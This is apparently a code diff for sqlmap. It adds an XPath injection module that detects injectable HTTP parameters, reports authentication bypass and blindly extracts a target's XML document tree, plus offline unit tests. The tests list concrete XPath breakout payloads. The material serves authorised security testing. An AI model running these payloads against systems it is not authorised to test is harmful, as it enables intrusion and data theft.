lambda b, p, prefix, idx=i: b.attributeValueStartsWith(p, idx, prefix))
attributes.append({"name": attrName, "value": attrValue or ""})
logger.info(" attribute: @%s='%s'" % (attrName, attrValue or ""))
text = None
if childCount == 0:
text = _inferValue(oracle, builder, path,
lambda b, p, prefix: b.textStartsWith(p, prefix))
children = []
for i in xrange(1, childCount + 1):
childPath = "%s/*[%d]" % (path, i)
child = _walkTree(oracle, builder, childPath, depth + 1)
if child:
children.append(child)
return {
"name": name,
"path": path,
"children": children,
"attributes": attributes,
"text": text,
}
def _treeToTable(node):
"""Flatten a tree node to (columns, rows) for grid output."""
columns = ["Path", "Element", "Attribute", "Value"]
rows = []
def _flatten(n, depth=0):
path = n["path"]
rows.append([path, n["name"], "", ""])
for attr in n.get("attributes", []):
rows.append([path, n["name"], "@" + attr["name"], attr["value"]])
if n.get("text"):
rows.append([path, n["name"], "text()", n["text"]])
for child in n.get("children", []):
_flatten(child, depth + 1)
_flatten(node)
return columns, [_ for _ in rows if _[3] or _[2] not in ("", "text()")]
def _grid(columns, rows):
columns = [getUnicode(_) for _ in columns]
rows = [[getUnicode(_) for _ in row] for row in rows]
widths = []
for index, column in enumerate(columns):
width = len(column)
for row in rows:
if index < len(row):
width = max(width, len(getUnicode(row[index])))
widths.append(width)
separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+"
def line(cells):
return "| " + " | ".join((getUnicode(cells[index]) if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |"
return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator])
def _dumpTable(title, columns, rows):
if rows:
conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows)))
def xpathScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP "
infoMsg += "parameters and walks the reachable XML document tree. SQL enumeration "
infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
logger.info(infoMsg)
if not conf.paramDict:
logger.error("no request parameters to test (use --data, GET params, or similar)")
return
tested = found = 0
slots = []
for place in (_ for _ in XPATH_PLACES if _ in conf.paramDict):
for parameter in list(conf.paramDict[place].keys()):
if conf.testParameter and parameter not in conf.testParameter:
continue
tested += 1
logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter))
# Phase 1: Probe the XPath parser for a backend hint
backendHint, _errorPayload = _probeBackendByParserError(place, parameter)
if backendHint:
backendHint = _fingerprintByError(backendHint)
# Phase 2: Establish a boolean oracle (authoritative)
template, payload, boundary = _detectBoolean(place, parameter)
if template:
if boundary and boundary.extractable:
found += 1
backend = backendHint or "Generic XPath"
logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend))
if conf.beep:
beep()
oracle = _makeOracle(place, parameter, template)
slots.append(Slot(place=place, parameter=parameter, backend=backend,
oracle=oracle, template=template, payload=payload,
boundary=boundary))
continue
# Detection-only: boolean differentiation confirmed but no extraction boundary.
# Report as auth bypass on credential fields; log generically otherwise.
found += 1
if _isPasswordParam(parameter):
title = "XPath auth bypass"
logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter))
else:
title = "XPath boolean-based blind (detection-only)"
logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath"))
if conf.beep:
beep()
conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload))
continue
if backendHint:
logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint))
if not slots:
if found:
logger.info("XPath injection confirmed (detection-only, no extractable boundary established)")
logger.info("XPath scan complete")
return
if tested:
warnMsg = "no parameter appears to be injectable via XPath injection (%d tested)" % tested
else:
warnMsg = "no parameters found to test for XPath injection"
logger.warning(warnMsg)
return
# Select the first oracle-bearing slot with an extractable boundary for tree-walking
slot = next((_ for _ in slots if _.oracle and _.boundary and _.boundary.extractable), None)
if not slot:
logger.info("XPath scan complete")
return
original = _originalValue(slot.place, slot.parameter) or "x"
# OR-style boundaries always-true if the original branch matches, so use a
# sentinel that is guaranteed not to appear as a field value. AND-style
# boundaries need the original branch to match; keep the original there.
if " or " in slot.boundary.prefix:
base = SENTINEL
else:
base = original
builder = _XPathPayloadBuilder(base, slot.boundary)
oracle = slot.oracle
# Refine backend fingerprint if generic
if not slot.backend or slot.backend == "Generic XPath":
backend = _backendFromError(oracle.template)
if backend:
backend = _fingerprintByError(backend)
if backend:
logger.info("identified back-end: '%s'" % backend)
slot = slot._replace(backend=backend)
title = "XPath boolean-based blind"
conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload))
# Blind XML tree-walking (attempted document-root traversal)
logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH)
root = _walkTree(oracle, builder)
if root:
columns, rows = _treeToTable(root)
logger.info("extracted %d node(s) from XML tree" % (len(rows)))
_dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows)
else:
warnMsg = "XPath injection is confirmed but the XML tree could not be walked. "
warnMsg += "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)"
logger.warning(warnMsg)
logger.info("XPath scan complete")

407
tests/test_xpath.py Normal file
View file

@ -0,0 +1,407 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
Offline, deterministic tests for the XPath injection engine. Mock oracles stand in for the
HTTP/lxml layer so detection, fingerprinting, blind inference, payload building, and output
formatting can be exercised without a live target.
"""
import unittest
from _testutils import bootstrap
bootstrap()
import lib.techniques.xpath.inject as xpath
SENTINEL = xpath.SENTINEL
class TestHelpers(unittest.TestCase):
def test_ratio(self):
self.assertGreater(xpath._ratio("abc", "abc"), 0.9)
self.assertLess(xpath._ratio("abc", "xyz"), 0.5)
def test_delim(self):
from lib.core.enums import PLACE
self.assertEqual(xpath._delim(PLACE.GET), '&')
self.assertEqual(xpath._delim(PLACE.COOKIE), ';')
def test_is_error(self):
self.assertTrue(xpath._isError("javax.xml.xpath.XPathExpressionException: error"))
self.assertTrue(xpath._isError("lxml.etree.XPathEvalError: Invalid expression"))
self.assertFalse(xpath._isError("normal page content"))
def test_backend_from_error(self):
self.assertIsNotNone(xpath._backendFromError("lxml.etree.XPathEvalError: Invalid expression"))
self.assertIsNotNone(xpath._backendFromError("System.Xml.XPath.XPathException: has an invalid token"))
self.assertIsNone(xpath._backendFromError("normal page"))
def test_is_password_param(self):
self.assertTrue(xpath._isPasswordParam("password"))
self.assertTrue(xpath._isPasswordParam("pass"))
self.assertFalse(xpath._isPasswordParam("username"))
def test_xpath_quote(self):
self.assertEqual(xpath._xpathQuote("hello"), "'hello'")
self.assertEqual(xpath._xpathQuote("it's"), "\"it's\"")
self.assertEqual(xpath._xpathQuote('say "hi"'), "'say \"hi\"'")
both = "it's \"great\""
q = xpath._xpathQuote(both)
self.assertIn("concat", q)
def test_make_payload_with_suffix(self):
b = xpath.Boundary("') or ", " or ('", True)
p = xpath._makePayload("x", b, "starts-with(name(/*),'d')")
self.assertEqual(p, "x') or starts-with(name(/*),'d') or ('")
def test_make_payload_no_suffix(self):
b = xpath.Boundary("' or ", "", True)
p = xpath._makePayload("x", b, "1=1")
self.assertEqual(p, "x' or 1=1")
def test_make_payload_with_suffix_only(self):
b = xpath.Boundary("' or ", " and '1'='1", True)
p = xpath._makePayload("x", b, "1=1")
self.assertEqual(p, "x' or 1=1 and '1'='1")
class TestBoundaryTable(unittest.TestCase):
def test_all_entries_in_boundary_lookup(self):
for bk in xpath.XPATH_BREAKOUT_PREFIXES:
self.assertIn(bk, xpath._BREAKOUT_BOUNDARY,
"Breakout '%s' not found in _BREAKOUT_BOUNDARY" % bk)
def test_function_arg_boundaries_are_extractable(self):
for bk in ("') or true() or ('", "') or '1'='1' or ('", "') or 1=1 or ('"):
b = xpath._BREAKOUT_BOUNDARY[bk]
self.assertTrue(b.extractable)
self.assertTrue(len(b.prefix) > 0)
self.assertTrue(len(b.suffix) > 0)
def test_simple_string_boundaries_have_suffix(self):
for bk in ("' or '1'='1", "' or true() or '", "' or 1=1 or '",
'" or "1"="1', '" or true() or "'):
b = xpath._BREAKOUT_BOUNDARY[bk]
if b is not None:
self.assertTrue(b.extractable)
self.assertTrue(len(b.suffix) > 0,
"Simple string breakout '%s' needs a suffix to absorb the trailing quote" % bk)
def test_union_wildcard_is_not_extractable(self):
b = xpath._BREAKOUT_BOUNDARY.get("']|//*|test['")
self.assertIsNone(b, "Union wildcard must not have an extraction boundary")
def test_numeric_has_leading_space(self):
for bk in (" or 1=1", " or true()"):
self.assertTrue(bk.startswith(" "),
"Numeric breakout '%s' needs leading whitespace" % bk)
b = xpath._BREAKOUT_BOUNDARY[bk]
self.assertTrue(b.extractable)
def test_all_extractable_have_prefix(self):
for bk, b in xpath._BREAKOUT_BOUNDARY.items():
if b is not None:
self.assertTrue(len(b.prefix) > 0,
"Extractable boundary for '%s' needs a prefix" % bk)
class TestPayloadBuilder(unittest.TestCase):
def setUp(self):
self.boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
self.builder = xpath._XPathPayloadBuilder("x", self.boundary)
def test_name_starts_with(self):
p = self.builder.nameStartsWith("/*", "d")
self.assertIn("starts-with(name(/*)", p)
self.assertIn("'d'", p)
def test_name_length(self):
p = self.builder.nameLength("/*", 9)
self.assertIn("string-length(name(/*))=9", p)
def test_child_count(self):
p = self.builder.childCount("/*", 3)
self.assertIn("count(/*/*)>=3", p)
def test_attribute_count(self):
p = self.builder.attributeCount("/*[1]", 2)
self.assertIn("count(/*[1]/@*)>=2", p)
def test_text_starts_with(self):
p = self.builder.textStartsWith("/*[1]/*[1]", "lut")
self.assertIn("starts-with(string(/*[1]/*[1])", p)
def test_empty_prefix(self):
p = self.builder.nameStartsWith("/*", "")
self.assertIn("''", p)
def test_uses_boundary_not_hardcoded(self):
p = self.builder.nameStartsWith("/*", "d")
self.assertNotIn("contains(username", p)
self.assertIn("x') or ", p)
self.assertIn(" or ('", p)
def test_simple_string_boundary_builder(self):
b = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
builder = xpath._XPathPayloadBuilder("x", b)
p = builder.nameStartsWith("/*", "d")
self.assertIn("x' or ", p)
self.assertIn(" and '1'='1", p)
class TestBooleanDetection(unittest.TestCase):
def setUp(self):
self.original_send = xpath._send
def tearDown(self):
xpath._send = self.original_send
def test_false_page_must_be_reproducible(self):
# True is stable, false changes every time -> no oracle
true_calls = [0]
def mock(place, parameter, value):
if "true()" in value:
return "true-page"
elif "false()" in value:
true_calls[0] += 1
return "false-page-%d" % true_calls[0]
return "default"
xpath._send = mock
template, payload, boundary = xpath._detectBoolean("GET", "q")
self.assertIsNone(template)
def test_detection_returns_extractable_boundary(self):
def mock(place, parameter, value):
if "true()" in value:
return '{"count":7,"entries":[{...}]}'
elif "false()" in value:
return '{"count":0,"entries":[],"error":null}'
return "default"
xpath._send = mock
template, payload, boundary = xpath._detectBoolean("GET", "q")
self.assertIsNotNone(template)
self.assertIsNotNone(boundary)
self.assertTrue(boundary.extractable)
class TestGridAndTable(unittest.TestCase):
def test_grid(self):
columns = ["Path", "Element", "Value"]
rows = [["/*", "root", ""], ["/*[1]", "child", "text"]]
grid = xpath._grid(columns, rows)
self.assertIn("Path", grid)
self.assertIn("root", grid)
def test_grid_empty(self):
grid = xpath._grid([], [])
self.assertIn("+", grid)
def test_tree_to_table(self):
node = {
"name": "directory", "path": "/*",
"children": [{"name": "user", "path": "/*[1]", "children": [],
"attributes": [{"name": "id", "value": "1"}], "text": None}],
"attributes": [], "text": None,
}
columns, rows = xpath._treeToTable(node)
self.assertIn("Path", columns)
self.assertGreater(len(rows), 0)
class TestExtraction(unittest.TestCase):
def test_infer_value_mock(self):
expected = "directory"
boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
builder = xpath._XPathPayloadBuilder("x", boundary)
class MockOracle(object):
def extract(self, payload):
import re
m = re.search(r"""starts-with\(name\(/\*\),'([^']*)'\)""", payload)
return expected.startswith(m.group(1)) if m else False
oracle = MockOracle()
result = xpath._inferValue(oracle, builder, "/*",
lambda b, p, prefix: b.nameStartsWith(p, prefix),
maxLen=20)
self.assertEqual(result, expected)
def test_infer_count(self):
expected = 3
boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
builder = xpath._XPathPayloadBuilder("x", boundary)
class MockOracle(object):
def extract(self, payload):
import re
m = re.search(r"count\(/\*/\*\)>=(\d+)", payload)
if m:
return int(m.group(1)) <= expected
return False
oracle = MockOracle()
result = xpath._inferCount(oracle, builder, "/*",
lambda b, p, c: b.childCount(p, c),
maxCount=8)
self.assertEqual(result, expected)
class TestBackendFingerprint(unittest.TestCase):
def test_lxml(self):
page = "lxml.etree.XPathEvalError: Invalid expression"
backend = xpath._backendFromError(page)
self.assertIsNotNone(backend)
self.assertIn("lxml", backend)
def test_java_jaxp(self):
page = "javax.xml.xpath.XPathExpressionException: A location path was expected"
backend = xpath._backendFromError(page)
self.assertIsNotNone(backend)
def test_dotnet(self):
page = "System.Xml.XPath.XPathException: Expression must evaluate to a node-set"
backend = xpath._backendFromError(page)
self.assertIsNotNone(backend)
def test_no_error(self):
page = "Normal page with user data"
backend = xpath._backendFromError(page)
self.assertIsNone(backend)
# --- Real XPath syntax validation (lxml) ---------------------------------------
_XML = b"""<?xml version="1.0"?><directory><user id="1"><name>luther</name></user><user id="2"><name>fluffy</name></user></directory>"""
_XPATH_TEMPLATES = {
"function_arg": "//user[contains(name,'%s')]",
"single_quoted": "//user[name='%s']",
"double_quoted": '//user[name="%s"]',
"numeric": "//user[position()=%s]",
"bare_predicate": "//user[%s]",
}
def _xpath_eval(template, payload):
"""Evaluate an XPath expression against _XML, return the match count."""
try:
from lxml import etree
except ImportError:
raise unittest.SkipTest("lxml not available")
root = etree.fromstring(_XML)
expr = template % payload
return len(root.xpath(expr))
class TestRealXPathSyntax(unittest.TestCase):
"""Verify that detection payloads and extraction predicates are syntactically
valid XPath and produce the expected boolean results."""
@staticmethod
def _count(template, payload):
return _xpath_eval(template, payload)
def _test_family(self, template_key, true_breakout, false_breakout, boundary_key, original="x"):
template = _XPATH_TEMPLATES[template_key]
boundary = xpath._BREAKOUT_BOUNDARY[boundary_key]
self.assertIsNotNone(boundary)
self.assertTrue(boundary.extractable)
# Detection payloads must be syntactically valid and yield true/false
truePayload = original + true_breakout
falsePayload = original + false_breakout
self.assertGreater(self._count(template, truePayload), 0,
"True payload '%s' should match at least one node" % truePayload)
self.assertEqual(self._count(template, falsePayload), 0,
"False payload '%s' should match no nodes" % falsePayload)
# Extraction predicate must be valid and change the result truthfully
builder = xpath._XPathPayloadBuilder(original, boundary)
truePred = xpath._makePayload(original, boundary, "true()")
falsePred = xpath._makePayload(original, boundary, "false()")
self.assertGreater(self._count(template, truePred), 0,
"Extraction true predicate must match")
self.assertEqual(self._count(template, falsePred), 0,
"Extraction false predicate must not match")
def test_function_arg_family(self):
self._test_family("function_arg",
"') or true() or ('", "') and false() and ('",
"') or true() or ('")
def test_single_quoted_family(self):
self._test_family("single_quoted",
"' or '1'='1", "' and '1'='2",
"' or '1'='1")
def test_double_quoted_family(self):
self._test_family("double_quoted",
'" or "1"="1', '" and "1"="2',
'" or "1"="1')
def test_numeric_family(self):
self._test_family("numeric",
" or 1=1", " and 1=2",
" or 1=1", original="1")
def test_bare_predicate_family(self):
self._test_family("bare_predicate",
" or true()", " and false()",
" or true()", original="1")
def test_function_arg_second_variant(self):
self._test_family("function_arg",
"') or '1'='1' or ('", "') and '1'='2' and ('",
"') or '1'='1' or ('")
def test_single_quoted_with_matching_original(self):
"""When the original value matches a record (name='luther'), OR-style
extraction with 'and' suffix is still decisive because the engine uses
a non-matching sentinel base for tree-walking."""
boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
# Simulate what xpathScan() does: use a sentinel as base for OR-style
sentinel = "zzznotpresent"
builder = xpath._XPathPayloadBuilder(sentinel, boundary)
truePred = xpath._makePayload(sentinel, boundary, "true()")
falsePred = xpath._makePayload(sentinel, boundary, "false()")
tpl = _XPATH_TEMPLATES["single_quoted"]
self.assertGreater(self._count(tpl, truePred), 0,
"OR extraction must match with sentinel base + true predicate")
self.assertEqual(self._count(tpl, falsePred), 0,
"OR extraction must not match with sentinel base + false predicate")
def test_all_extractable_boundaries_have_valid_extraction(self):
# Match each boundary to an appropriate template and original value.
_CONTEXT = {
"') or true() or ('": ("function_arg", "x"),
"') or '1'='1' or ('": ("function_arg", "x"),
"') or 1=1 or ('": ("function_arg", "x"),
'") or true() or ("': ("function_arg", "x"),
"' or '1'='1": ("single_quoted", "x"),
"' or true() or '": ("single_quoted", "x"),
"' or 1=1 or '": ("single_quoted", "x"),
"' and '1'='1": ("single_quoted", "x"),
'" or "1"="1': ("double_quoted", "x"),
'" or true() or "': ("double_quoted", "x"),
" or 1=1": ("numeric", "999"),
" or true()": ("bare_predicate", "999"),
}
for bk, boundary in xpath._BREAKOUT_BOUNDARY.items():
if boundary is None or not boundary.extractable:
continue
tkey, original = _CONTEXT.get(bk, ("function_arg", "x"))
template = _XPATH_TEMPLATES[tkey]
payload = xpath._makePayload(original, boundary, "true()")
try:
count = self._count(template, payload)
except Exception as e:
self.fail("Boundary '%s' in '%s' with orig='%s' invalid: %s\n payload: %s" % (bk, tkey, original, e, payload))
self.assertIsInstance(count, int,
"Boundary '%s' in '%s' produced no count" % (bk, tkey))